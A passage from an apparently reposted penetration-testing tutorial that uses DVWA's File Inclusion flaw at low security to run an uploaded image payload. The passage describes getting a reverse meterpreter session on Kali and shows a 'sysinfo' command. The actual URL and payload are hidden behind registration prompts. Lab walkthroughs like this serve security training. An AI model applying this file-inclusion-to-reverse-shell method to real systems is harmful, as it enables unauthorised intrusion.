Again set security level low in DVWA and turn on the File Inclusion vulnerability and repeat the same process as above, now the paste the above-copied path of uploaded image inside the URL and execute it which will provide a reverse connection on Kali Linux.
[To see content please register here]
1
[To see content please register here]
![[Image: 20.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-6Dyw43iciHU/WJ8okYD_uUI/AAAAAAAAPRI/ziq95NnzcCsJffswHVJ4oNOWMqr-y0aCQCLcB/s1600/20.png?w=687&ssl=1)
meterpreter > sysinfo
1
meterpreter > sysinfo
I have got a meterpreter session of victim PC
![[Image: 21.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-Uq4EhrWhp2I/WJ8okQu19cI/AAAAAAAAPRM/tNtAV0jn1jwVSuvD1Yt4TZaHlSb0zxnKgCLcB/s1600/21.png?w=687&ssl=1)